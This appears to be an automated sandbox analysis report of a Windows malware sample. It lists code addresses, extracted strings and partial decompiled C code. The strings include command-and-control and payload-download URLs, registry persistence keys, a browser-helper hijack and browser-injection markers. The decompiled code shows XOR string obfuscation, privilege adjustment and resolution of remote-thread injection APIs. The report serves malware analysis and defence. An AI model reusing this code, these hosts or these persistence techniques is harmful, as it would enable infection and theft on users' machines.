0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00000000
0x00404b67
0x004047e7
0x004047ef
0x00404805
0x00404806
0x0040480d
0x0040480e
0x00404823
0x00404823
0x0040482a
0x0040482b
0x00404830
0x00404833
0x00000000
0x00000000
0x00404815
0x0040481c
0x0040481d
0x0040481e
0x0040481e
0x00000000
0x00404823
0x00000000
0x004047ef
0x0040458d
0x00404592
0x00404594
0x00000000
0x00000000
0x0040459f
0x004045a7
0x004045ac
0x004045b2
0x004045b7
0x004045b8
0x004045bd
0x004045be
0x004045c3
0x004045c8
0x004045c8
0x004045cd
0x00000000
0x00000000
0x004045cf
0x004045d2
0x004045d2
0x004045de
0x004045e3
0x004045ea
0x004045ec
0x0040460c
0x004045ee
0x004045f4
0x00404600
0x00404600
0x00404616
0x0040461e
0x00404636
0x0040463b
0x00404642
0x00404644
0x004047bd
0x004047c4
0x00000000
0x004047c4
0x0040464a
0x0040464d
0x00000000
0x00000000
0x00404668
0x0040466d
0x00404672
0x00404676
0x00404678
0x0040467a
0x0040467a
0x00404682
0x00404687
0x0040468c
0x0040468e
0x00404690
0x00404694
0x00404697
0x00404697
0x00404699
0x00000000
0x00000000
0x004046a0
0x004046a2
0x004046a3
0x004046a5
0x004046a6
0x004046a6
0x004046ab
0x004046b2
0x004046b5
0x004046b6
0x004046bb
0x004046c2
0x004046c4
0x004046cb
0x004046cd
0x004046ce
0x004046d2
0x004046d2
0x004046d6
0x004046e1
0x004046e4
0x004046e8
0x004046ea
0x004046eb
0x004046f0
0x004046f3
0x004046f3
0x004046f5
0x00000000
0x00000000
0x004046fc
0x004046fe
0x004046ff
0x004046ff
0x004046ff
0x0040471b
0x00404722
0x00404727
0x0040472c
0x0040474d
0x0040474d
0x00404759
0x0040476d
0x00404775
0x00404786
0x00404792
0x00404797
0x00404798
0x0040479d
0x0040479d
0x004047b0
0x004047b5
0x00000000
0x004047b5
0x004044d6
0x004044d9
0x00000000
0x00000000
0x004044e3
0x004044ea
0x00404504
0x00404510
0x00000000
0x00404510
0x00404307
0x0040430f
0x00404314
0x0040431a
0x0040431f
0x00404320
0x00404326
0x0040432b
0x00404336
0x0040433b
0x0040433d
0x004043b6
0x004043b6
0x004043bb
0x004043d4
0x004043d9
0x004043db
0x004043dd
0x004043df
0x004043e2
0x004043eb
0x00404402
0x00404408
0x00404408
0x004043e2
0x004043dd
0x0040440d
0x00404412
0x0040442b
0x00404430
0x00404432
0x00404434
0x00404436
0x00404439
0x00404454
0x0040445a
0x0040445a
0x00404439
0x00404434
0x00404461
0x00404469
0x00404472
0x00404477
0x0040447f
0x0040449c
0x0040449c
0x004044a1
0x004044a3
0x004044a8
0x004044a8
0x00000000
0x004044a8
0x0040433f
0x00404344
0x00404345
0x0040434b
0x00404350
0x00404358
0x0040435e
0x00404364
0x00404369
0x0040436b
0x0040437a
0x0040437a
0x0040437f
0x00404380
0x00404386
0x0040438c
0x00404392
0x00404398
0x0040439d
0x0040439f
0x00000000
0x00000000
0x004043a9
0x004043ae
0x004043b0
0x00000000
0x00000000
0x00000000
0x004043b0
0x00404371
0x00404376
0x00404378
0x00000000
0x00000000
0x00000000
0x00404378
0x00404275
0x00404279
0x00000000
0x00404279
0x00403ff5
0x00403ffa
0x0040425a
0x0040425f
0x00000000
0x00000000
0x00404267
0x00000000
0x00404267
0x00404004
0x00404009
0x0040400b
0x0040400d
0x0040416b
0x0040416b
0x00404170
0x00000000
0x00000000
0x0040418f
0x00404194
0x00404196
0x00000000
0x00000000
0x0040419c
0x004041c8
0x004041cd
0x004041cf
0x0040424c
0x00404253
0x00000000
0x00404253
0x004041d1
0x004041f9
0x004041fe
0x00404200
0x00404219
0x0040421e
0x00404220
0x00404220
0x00404226
0x00404226
0x00404231
0x00404236
0x0040423b
0x00404247
0x00404247
0x00000000
0x0040423b
0x0040401a
0x0040401f
0x00404023
0x00404025
0x0040405a
0x0040405a
0x0040405f
0x0040406a
0x00404074
0x00404074
0x00404077
0x0040407c
0x0040407c
0x0040407e
0x00000000
0x00000000
0x00404080
0x00404087
0x004040da
0x004040e3
0x00000000
0x004040e3
0x00404089
0x00404096
0x0040409b
0x0040409c
0x0040409e
0x004040a3
0x004040a5
0x004040b6
0x004040c4
0x004040c9
0x004040d0
0x004040d2
0x00000000
0x00000000
0x004040d4
0x004040d5
0x004040d8
0x00000000
0x00000000
0x00000000
0x004040d8
0x004040a7
0x004040ac
0x004040ad
0x004040b2
0x004040b4
0x00000000
0x00000000
0x00000000
0x004040b4
0x004040eb
0x004040eb
0x004040ed
0x004040f2
0x004040f2
0x004040f4
0x00000000
0x00000000
0x004040ff
0x00404100
0x00404100
0x00404107
0x0040410c
0x0040410c
0x0040410c
0x0040410e
0x0040410e
0x00404110
0x00000000
0x00000000
0x0040411b
0x0040411c
0x0040411c
0x00404123
0x00404123
0x00404123
0x00404123
0x00404126
0x00404126
0x00404128
0x00404128
0x0040412a
0x00000000
0x00000000
0x00404138
0x00404144
0x00404145
0x00404145
0x0040414c
0x00404151
0x00404158
0x00404160
0x00404166
0x00404166
0x00000000
0x00404151
0x0040402d
0x00404036
0x0040403b
0x00404042
0x00404049
0x00404049
0x0040404b
0x00000000
0x00000000
0x00404055
0x00404057
0x00404057
0x00000000
0x0040427e
0x0040427e
0x0040427e
0x00403fb2
0x0040395a
0x0040395f
0x0040395f
0x00403964
0x00000000
0x00000000
0x00403966
0x00403969
0x00403969
0x0040396c
0x00403971
0x00403971
0x00403976
0x00000000
0x00000000
0x00403978
0x0040397b
0x0040397b
0x0040397e
0x00403983
0x00403983
0x00403988
0x00000000
0x00000000
0x0040398a
0x0040398d
0x0040398d
0x00403990
0x00403995
0x00403995
0x0040399a
0x00000000
0x00000000
0x0040399c
0x0040399f
0x0040399f
0x004039a2
0x004039a7
0x004039a7
0x004039ac
0x00000000
0x00000000
0x004039ae
0x004039b1
0x004039b1
0x004039c5
0x004039d5
0x004039e5
0x004039f5
0x004039ff
0x00000000
0x004039ff
0x004038ac
0x004038b1
0x004038b1
0x004038b6
0x00000000
0x00000000
0x004038b8
0x004038bb
0x004038bb
0x004038c9
0x00000000
0x004038c9
0x0040385c
0x00403861
0x00403861
0x00403866
0x00000000
0x00000000
0x00403868
0x0040386b
0x0040386b
0x00403879
0x00000000
0x00403879
0x004035b5
0x004035ba
0x004035ba
0x004035bf
0x00000000
0x00000000
0x004035c1
0x004035c4
0x004035c4
0x004035d2
0x004035d7
0x004035dc
0x004035dc
0x004035e1
0x00000000
0x00000000
0x004035e3
0x004035e6
0x004035e6
0x004035e9
0x004035ee
0x004035ee
0x004035f3
0x00000000
0x00000000
0x004035f5
0x004035f8
0x004035f8
0x004035fb
0x00403600
0x00403600
0x00403605
0x00000000
0x00000000
0x00403607
0x0040360a
0x0040360a
0x0040360d
0x00403612
0x00403612
0x00403617
0x00000000
0x00000000
0x00403619
0x0040361c
0x0040361c
0x0040361f
0x00403624
0x00403624
0x00403629
0x00000000
0x00000000
0x0040362b
0x0040362e
0x0040362e
0x0040363b
0x00403641
0x0040364e
0x0040365e
0x0040366e
0x00403673
0x00403678
0x0040367d
0x0040367f
0x00403681
0x00403691
0x00403691
0x00403693
0x00403698
0x00403698
0x0040369d
0x00000000
0x00000000
0x0040369f
0x004036a2
0x004036a2
0x004036a5
0x004036aa
0x004036aa
0x004036af
0x00000000
0x00000000
0x004036b1
0x004036b4
0x004036b4
0x004036bd
0x004036c2
0x004036c4
0x004036c6
0x00000000
0x00000000
0x004036d2
0x004036d7
0x004036d9
0x004036db
0x00000000
0x00000000
0x004036ed
0x004036ef
0x004036f1
0x00000000
0x00000000
0x004036f7
0x00403709
0x0040370f
0x0040371a
0x0040371c
0x0040371e
0x004037b2
0x004037b4
0x004037c0
0x00000000
0x004037c0
0x00403724
0x0040372c
0x0040372e
0x0040372e
0x00403732
0x00000000
0x00000000
0x00403734
0x00403738
0x0040373c
0x0040373e
0x004037a9
0x004037a9
0x00000000
0x004037a9
0x00403740
0x00403742
0x00000000
0x00000000
0x00403744
0x0040374c
0x00403750
0x00403755
0x00403767
0x00403767
0x0040377c
0x00403783
0x00403785
0x00403787
0x00403789
0x0040378b
0x0040378f
0x00403791
0x00403795
0x00403797
0x00403797
0x00403795
0x0040378f
0x0040379c
0x004037a1
0x00000000
0x004037a1
0x00403757
0x00403760
0x00403759
0x00403759
0x00403759
0x00403765
0x00000000
0x00000000
0x00000000
0x00000000
0x00403765
0x00000000
0x0040372e
0x004034ce
0x004034d3
0x004034da
0x004034dc
0x00000000
0x00000000
0x004034e7
0x004034f5
0x004034f5
0x004034f7
0x0040350a
0x0040350f
0x0040350f
0x00403511
0x00000000
0x00000000
0x0040351a
0x00403521
0x0040359f
0x00000000
0x0040359f
0x00403532
0x00403532
0x00403540
0x00403545
0x00403547
0x00000000
0x00000000
0x00403550
0x00403556
0x0040355b
0x00403563
0x0040449c
0x00000000
0x0040449c
0x00403478
0x0040347d
0x0040347d
0x00403482
0x00000000
0x00000000
0x00403484
0x00403487
0x00403487
0x00403490
0x00403495
0x00403497
0x0040349d
0x0040349d
0x00000000

APIs

GetProcessHeap.KERNEL32 ref: 00403421
GetVersionExA.KERNEL32(004120F0), ref: 0040343A

Strings

Default Flags, xrefs: 00403F98
urlinj_conn, xrefs: 00403BF6
winrnt.exe, xrefs: 00403A10
rmass.exe, xrefs: 00403A22
GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 00403BAE
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}, xrefs: 00403DB8
urlinj_creat, xrefs: 00403C08
%AppData%\, xrefs: 00403B54, 00404D60
aset32.exe, xrefs: 00403A6A
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 00403C50
gymspzd.dll, xrefs: 00403A58
explorer.exe, xrefs: 00403D16
urlinj_creat_f, xrefs: 00403C2C
urlinj_xfer, xrefs: 00403C1A
grazie.gif, xrefs: 00403CAA
http://utbidet-ugeas.biz/d/rpt?, xrefs: 00403AD6
mozilla.exe, xrefs: 00403D4C
qnd_b__-12, xrefs: 00403F74, 00403FC5
SubshellState, xrefs: 00403CE0
DLLName, xrefs: 00403D82
StubPath, xrefs: 00403B8A
kernel32.dll, xrefs: 00403451, 00403463
{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}, xrefs: 00403B1E, 004048C5
isdn, xrefs: 00403AFA
\Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004038EC
ThreadingModel, xrefs: 00403DCA
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}, xrefs: 00403A46
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, xrefs: 004038FE
Mozilla/4.0 (compatible; MSIE 6.0; Win32), xrefs: 00403BD2
%ComSpec%, xrefs: 00403B30, 00404294
Connections, xrefs: 00403922
opera.exe, xrefs: 00403D70
seamonkey.exe, xrefs: 00403D5E
http://utbidet-ugeas.biz/d/cc, xrefs: 00403C98
ahuy.exe, xrefs: 00403A7C
urlinj_fork, xrefs: 00403C3E
ntdbg.exe, xrefs: 00403AA0
Debugger, xrefs: 00403B66
wininet.dll, xrefs: 00403934, 00403946
CLSID\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\InProcServer32, xrefs: 00403DA6
%CommonProgramFiles%\System\, xrefs: 00403B42
--k33p, xrefs: 0040343F, 004034B8
http://%s.biz/d/G?, xrefs: 00403AC4
g00d d0gg, xrefs: 00403CF2
RECOVER32.DLL, xrefs: 00403A34
ConnPred, xrefs: 00403C62
%02X, xrefs: 00403FB6
_Classes, xrefs: 004038DA
.dll, xrefs: 00403EC4, 00403F2B, 00403F41
Both, xrefs: 00403DDC
iexplore.exe, xrefs: 00403D28
QlC5hT0yHn63XEm5LqJ2OxSkGj2v, xrefs: 004047F1
tombul.gif, xrefs: 00403CCE
modem, xrefs: 00403AE8
.exe, xrefs: 00403EB2, 00403EE9, 00403EFF, 00403F15
winlogon.exe, xrefs: 00403D04
http://%s.biz/d/N?, xrefs: 00403AB2
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy, xrefs: 00403F86
GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0), xrefs: 00403BC0
museum, xrefs: 00403B9C
firefox.exe, xrefs: 00403D3A
UseExtProfile, xrefs: 00403C74
rasapi32.dll, xrefs: 00403834, 0040384C
IsInstalled, xrefs: 00403B78
%u.%u.%u.%s, xrefs: 00403B0C
idbg32.exe, xrefs: 00403A8E
http://%s/, xrefs: 00403DEE, 00403E05
Startup, xrefs: 00403D94
UseDflProfile, xrefs: 00403C86
HTTP/1.0 200, xrefs: 00403BE4
ProxyEnable, xrefs: 00403910
iphlpapi.dll, xrefs: 0040388A, 0040389C
http://69.50.173.166/gdnOT2424.exe, xrefs: 00403CBC

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: HeapProcessVersion
String ID: %02X$%AppData%\$%ComSpec%$%CommonProgramFiles%\System\$%u.%u.%u.%s$--k33p$.dll$.exe$Both$CLSID\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\InProcServer32$ConnPred$Connections$DLLName$Debugger$Default Flags$GET /%s HTTP/1.0Host: %sUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$GET /%s HTTP/1.0Host: %s:%uUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)$HTTP/1.0 200$IsInstalled$Mozilla/4.0 (compatible; MSIE 6.0; Win32)$ProxyEnable$QlC5hT0yHn63XEm5LqJ2OxSkGj2v$RECOVER32.DLL$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections$Startup$StubPath$SubshellState$ThreadingModel$UseDflProfile$UseExtProfile$\Software\Microsoft\Windows\CurrentVersion\Internet Settings$_Classes$ahuy.exe$aset32.exe$explorer.exe$firefox.exe$g00d d0gg$grazie.gif$gymspzd.dll$http://%s.biz/d/G?$http://%s.biz/d/N?$http://%s/$http://69.50.173.166/gdnOT2424.exe$http://utbidet-ugeas.biz/d/cc$http://utbidet-ugeas.biz/d/rpt?$idbg32.exe$iexplore.exe$iphlpapi.dll$isdn$kernel32.dll$modem$mozilla.exe$museum$ntdbg.exe$opera.exe$qnd_b__-12$rasapi32.dll$rmass.exe$seamonkey.exe$tombul.gif$urlinj_conn$urlinj_creat$urlinj_creat_f$urlinj_fork$urlinj_xfer$wininet.dll$winlogon.exe$winrnt.exe${%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}
API String ID: 2203647613-402672383
Opcode ID: 5f4e3c5ee09516bb0968bbac5de502e1e78267ef42d137a5ec15b0ec5d76d40a
Instruction ID: 7ac2c5788e51c7a3e4843286e6f135765ee1a2bd270a6153adf5efe2d07321ba
Opcode Fuzzy Hash: 5f4e3c5ee09516bb0968bbac5de502e1e78267ef42d137a5ec15b0ec5d76d40a
Instruction Fuzzy Hash: 0F027F702042416ADB309A658A857EF299CE756315F50CC3BF685FA2C1D7FCDAC08B5E

Uniqueness

Uniqueness Score: -1.00%

Function 004035B5 Relevance: 43.9, APIs: 16, Strings: 9, Instructions: 175
libraryloadernativeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E004035B5() {
				signed char* _t467;
				signed char* _t469;
				signed char* _t470;
				signed char* _t471;
				signed char* _t472;
				signed char* _t473;
				struct HINSTANCE__* _t474;
				signed int _t478;
				signed char* _t479;
				signed char* _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed char* _t487;
				struct HINSTANCE__* _t488;
				signed char* _t489;
				struct HINSTANCE__* _t490;
				signed char* _t491;
				signed char _t492;
				signed char _t493;
				signed char _t494;
				signed char _t495;
				signed char _t496;
				struct HINSTANCE__* _t497;
				signed char* _t498;
				signed char _t499;
				signed char _t500;
				signed char _t501;
				signed char _t502;
				signed char _t503;
				signed char _t504;
				signed char _t505;
				signed char _t506;
				signed char _t507;
				signed char _t508;
				signed char _t509;
				signed char _t510;
				signed char _t511;
				signed char _t512;
				signed char _t513;
				signed char _t514;
				signed char _t515;
				signed char _t516;
				signed char _t517;
				signed char _t518;
				signed char _t519;
				signed char _t520;
				signed char _t521;
				signed char _t522;
				signed char _t523;
				signed char _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t528;
				signed char _t529;
				signed char _t530;
				signed char _t531;
				signed char _t532;
				signed char _t533;
				signed char _t534;
				signed char _t535;
				signed char _t536;
				signed char _t537;
				signed char _t538;
				signed char _t539;
				signed char _t540;
				signed char _t541;
				signed char _t542;
				signed char _t543;
				signed char _t544;
				signed char _t545;
				signed char _t546;
				signed char _t547;
				signed char _t548;
				signed char _t549;
				signed char _t550;
				signed char _t551;
				signed char _t552;
				signed char _t553;
				void* _t558;
				signed char* _t559;
				signed char _t560;
				int _t561;
				intOrPtr _t571;
				signed int _t573;
				signed char _t576;
				signed char _t577;
				signed char _t578;
				signed int _t580;
				long _t581;
				signed int _t582;
				void* _t584;
				char* _t589;
				signed int _t592;
				signed char* _t611;
				signed int _t614;
				void* _t616;
				signed int _t617;
				signed int _t618;
				void* _t622;
				signed int _t623;
				signed int _t624;
				CHAR* _t627;
				signed int _t629;
				long _t630;
				CHAR* _t631;
				signed int _t633;
				long _t634;
				CHAR* _t639;
				void* _t641;
				CHAR* _t642;
				void* _t644;
				char* _t654;
				signed int _t655;
				signed char* _t660;
				signed int _t663;
				signed int _t664;
				signed int _t670;
				signed int _t671;
				signed int _t676;
				signed int _t681;
				signed int _t683;
				void* _t685;
				signed int _t689;
				void* _t691;
				signed int _t696;
				long _t700;
				int _t701;
				signed int _t707;
				signed int _t709;
				signed int _t712;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t728;
				signed int _t731;
				signed int _t733;
				signed int _t736;
				signed int _t738;
				void* _t742;
				signed int _t747;
				signed int _t749;
				signed int _t751;
				int _t755;
				void* _t756;
				void* _t758;
				char* _t759;
				char* _t760;
				signed int _t761;
				char* _t762;
				char* _t763;
				char* _t764;
				char* _t765;
				char* _t766;
				signed int _t767;
				char* _t768;
				signed int _t769;
				char* _t771;
				CHAR* _t772;
				signed int _t776;
				signed int _t778;
				int _t781;
				void* _t795;
				int _t796;
				signed int _t799;
				CHAR* _t805;
				signed int _t807;
				long _t808;
				signed int _t813;
				signed int _t821;
				signed int _t822;
				signed char _t830;
				signed int _t836;
				signed int _t840;
				void* _t842;
				int _t843;
				void* _t846;
				signed char _t857;
				int _t858;
				signed char* _t859;
				void* _t860;
				void* _t862;
				signed int _t867;
				void* _t869;
				void* _t870;
				long* _t871;
				signed int* _t874;
				long _t884;
				int _t885;
				signed char _t895;
				void* _t898;
				signed int _t900;
				int _t901;
				CHAR* _t902;
				void* _t903;
				void* _t905;
				signed int _t908;
				void* _t910;
				void* _t911;
				void* _t912;
				signed int* _t915;
				void* _t924;
				int _t925;
				signed char _t935;
				int _t943;
				CHAR* _t945;
				void* _t951;
				void* _t958;
				CHAR* _t963;
				signed int _t964;
				signed int _t966;
				void* _t968;
				void* _t975;
				signed int _t977;
				signed int _t979;
				signed int _t982;
				signed int _t985;
				void* _t989;
				long _t990;
				int _t992;
				signed int _t1002;
				signed int _t1003;
				signed char* _t1071;
				signed char* _t1072;
				signed char* _t1073;
				signed char* _t1074;
				signed char* _t1075;
				signed char* _t1086;
				signed char* _t1088;
				signed int _t1090;
				signed int _t1092;
				signed char* _t1094;
				signed int _t1095;
				signed char _t1099;
				intOrPtr _t1101;
				signed int _t1102;
				signed char _t1103;
				struct HINSTANCE__* _t1106;
				struct HINSTANCE__* _t1107;
				signed int _t1110;
				struct HINSTANCE__* _t1111;
				struct HINSTANCE__* _t1112;
				struct HINSTANCE__* _t1113;
				CHAR* _t1114;
				CHAR* _t1115;
				char* _t1116;
				CHAR* _t1117;
				CHAR* _t1118;
				CHAR* _t1119;
				CHAR* _t1120;
				CHAR* _t1121;
				CHAR* _t1122;
				CHAR* _t1123;
				long* _t1124;
				void** _t1125;
				char* _t1126;
				char* _t1127;
				CHAR* _t1128;
				signed int _t1131;
				char* _t1132;
				char* _t1134;
				char* _t1135;
				char* _t1136;
				long* _t1137;
				CHAR* _t1138;
				int _t1139;
				CHAR* _t1140;
				CHAR* _t1141;
				void* _t1142;
				signed int* _t1144;
				char* _t1145;
				void* _t1146;
				CHAR* _t1147;
				CHAR* _t1148;
				void* _t1149;
				signed int* _t1151;
				char* _t1152;
				CHAR* _t1153;
				struct _STARTUPINFOA* _t1154;
				void* _t1155;
				void* _t1156;
				long _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1160;
				CHAR* _t1161;
				signed char* _t1162;
				signed char _t1163;
				long* _t1167;
				long* _t1168;
				signed int _t1169;
				signed int _t1171;
				signed char _t1176;
				long _t1177;
				long _t1178;
				void* _t1179;
				signed int* _t1203;
				signed char* _t1204;
				signed char* _t1205;
				signed int* _t1207;
				signed int* _t1210;
				void* _t1215;
				void* _t1216;
				char* _t1217;
				signed char* _t1218;
				void* _t1219;
				void* _t1220;
				long _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				signed int* _t1225;
				void** _t1226;
				signed int _t1228;
				void** _t1229;
				void** _t1230;
				char* _t1231;
				CHAR* _t1232;
				signed char* _t1233;
				long* _t1234;
				signed int* _t1235;
				void* _t1236;
				void* _t1237;
				char* _t1238;
				signed int* _t1239;
				void* _t1240;
				char* _t1241;
				signed int* _t1242;
				CHAR* _t1244;
				signed int _t1245;
				signed int _t1246;
				signed int* _t1247;
				void* _t1248;
				void* _t1249;
				long _t1250;
				struct _FILETIME* _t1251;
				void* _t1252;
				void* _t1253;
				long* _t1254;

				_t467 = "CreateRemoteThread";
				while(_t467 < 0x4107ce) {
					 *_t467 =  *_t467 ^ 0x000000d4;
					_t467 =  &(_t467[1]);
				}
				 *0x412260 = GetProcAddress(_t1106, "CreateRemoteThread");
				_t469 = "ntdll.dll";
				while(1) {
					__eflags = _t469 - 0x4107bb;
					if(_t469 >= 0x4107bb) {
						break;
					}
					 *_t469 =  *_t469 ^ 0x000000d4;
					_t469 =  &(_t469[1]);
				}
				_t470 = "NtAllocateVirtualMemory";
				while(1) {
					__eflags = _t470 - 0x4107b1;
					if(_t470 >= 0x4107b1) {
						break;
					}
					 *_t470 =  *_t470 ^ 0x000000d4;
					_t470 =  &(_t470[1]);
				}
				_t471 = "NtWriteVirtualMemory";
				while(1) {
					__eflags = _t471 - 0x410799;
					if(_t471 >= 0x410799) {
						break;
					}
					 *_t471 =  *_t471 ^ 0x000000d4;
					_t471 =  &(_t471[1]);
				}
				_t472 = "NtShutdownSystem";
				while(1) {
					__eflags = _t472 - 0x410784;
					if(_t472 >= 0x410784) {
						break;
					}
					 *_t472 =  *_t472 ^ 0x000000d4;
					_t472 =  &(_t472[1]);
				}
				_t473 = "RtlAdjustPrivilege";
				while(1) {
					__eflags = _t473 - 0x410773;
					if(_t473 >= 0x410773) {
						break;
					}
					 *_t473 =  *_t473 ^ 0x000000d4;
					_t473 =  &(_t473[1]);
				}
				_t474 = LoadLibraryA("ntdll.dll");
				_t1107 = _t474;
				 *0x412220 = GetProcAddress(_t474, "NtAllocateVirtualMemory");
				 *0x412230 = GetProcAddress(_t1107, "NtWriteVirtualMemory");
				 *0x412240 = GetProcAddress(_t1107, "NtShutdownSystem");
				_t478 = GetProcAddress(_t1107, "RtlAdjustPrivilege");
				 *0x412250 = _t478;
				__eflags = _t478;
				_t1171 = _t478;
				if(_t478 != 0) {
					RtlAdjustPrivilege(0x14, 1, 0, _t1253 + 0xa7); // executed
				}
				_t479 = "NtOpenProcessToken";
				while(1) {
					__eflags = _t479 - 0x410760;
					if(_t479 >= 0x410760) {
						break;
					}
					 *_t479 =  *_t479 ^ 0x000000d4;
					_t479 =  &(_t479[1]);
				}
				_t480 = "NtQueryInformationToken";
				while(1) {
					__eflags = _t480 - 0x41074d;
					if(_t480 >= 0x41074d) {
						break;
					}
					 *_t480 =  *_t480 ^ 0x000000d4;
					_t480 =  &(_t480[1]);
				}
				_t481 = GetProcAddress(_t1107, "NtOpenProcessToken");
				__eflags = _t481;
				_t1224 = _t481;
				if(_t481 == 0) {
					L46:
					_push(_t1253 + 0xb78);
					_push(2); // executed
					L004061E0(); // executed
					_t483 = GetTickCount();
					_t484 = GetCurrentProcessId();
					_t1110 = _t483 ^ _t484 ^ GetCurrentThreadId() << 0x00000010;
					__eflags = _t1110;
					_t487 = "rasapi32.dll";
					 *0x4122a0 = _t1110;
					while(1) {
						__eflags = _t487 - 0x410722;
						if(_t487 >= 0x410722) {
							break;
						}
						 *_t487 =  *_t487 ^ 0x000000d4;
						_t487 =  &(_t487[1]);
					}
					_t488 = LoadLibraryA("rasapi32.dll"); // executed
					__eflags = _t488;
					_t1111 = _t488;
					if(_t488 == 0) {
						 *0x4121b0 = 0;
						L55:
						_t489 = "iphlpapi.dll";
						while(1) {
							__eflags = _t489 - 0x410701;
							if(_t489 >= 0x410701) {
								break;
							}
							 *_t489 =  *_t489 ^ 0x000000d4;
							_t489 =  &(_t489[1]);
						}
						_t490 = LoadLibraryA("iphlpapi.dll"); // executed
						__eflags = _t490;
						_t1112 = _t490;
						if(_t490 == 0) {
							 *0x4121c0 = 0;
							L64:
							_t491 = "_Classes";
							while(1) {
								__eflags = _t491 - 0x4106e5;
								if(_t491 >= 0x4106e5) {
									break;
								}
								 *_t491 =  *_t491 ^ 0x000000d4;
								_t491 =  &(_t491[1]);
							}
							_t492 = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings";
							while(1) {
								__eflags = _t492 - 0x4106dc;
								if(_t492 >= 0x4106dc) {
									break;
								}
								 *_t492 =  *_t492 ^ 0x000000d4;
								__eflags =  *_t492;
								_t492 = (_t492 ^ _t1171) + 1;
							}
							_t493 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections";
							while(1) {
								__eflags = _t493 - 0x410687;
								if(_t493 >= 0x410687) {
									break;
								}
								 *_t493 =  *_t493 ^ 0x000000d4;
								__eflags =  *_t493;
								_t493 = (_t493 ^ _t1171) + 1;
							}
							_t494 = "ProxyEnable";
							while(1) {
								__eflags = _t494 - 0x410621;
								if(_t494 >= 0x410621) {
									break;
								}
								 *_t494 =  *_t494 ^ 0x000000d4;
								__eflags =  *_t494;
								_t494 = (_t494 ^ _t1171) + 1;
							}
							_t495 = "Connections";
							while(1) {
								__eflags = _t495 - 0x410615;
								if(_t495 >= 0x410615) {
									break;
								}
								 *_t495 =  *_t495 ^ 0x000000d4;
								__eflags =  *_t495;
								_t495 = (_t495 ^ _t1171) + 1;
							}
							_t496 = "wininet.dll";
							while(1) {
								__eflags = _t496 - 0x410609;
								if(_t496 >= 0x410609) {
									break;
								}
								 *_t496 =  *_t496 ^ 0x000000d4;
								__eflags =  *_t496;
								_t496 = (_t496 ^ _t1171) + 1;
							}
							_t497 = LoadLibraryA("wininet.dll"); // executed
							__eflags = _t497;
							_t1113 = _t497;
							if(_t497 == 0) {
								 *0x4121d0 = 0;
								L105:
								_t498 = "winrnt.exe";
								while(1) {
									__eflags = _t498 - 0x4105a6;
									if(_t498 >= 0x4105a6) {
										break;
									}
									 *_t498 =  *_t498 ^ 0x000000d4;
									_t498 =  &(_t498[1]);
								}
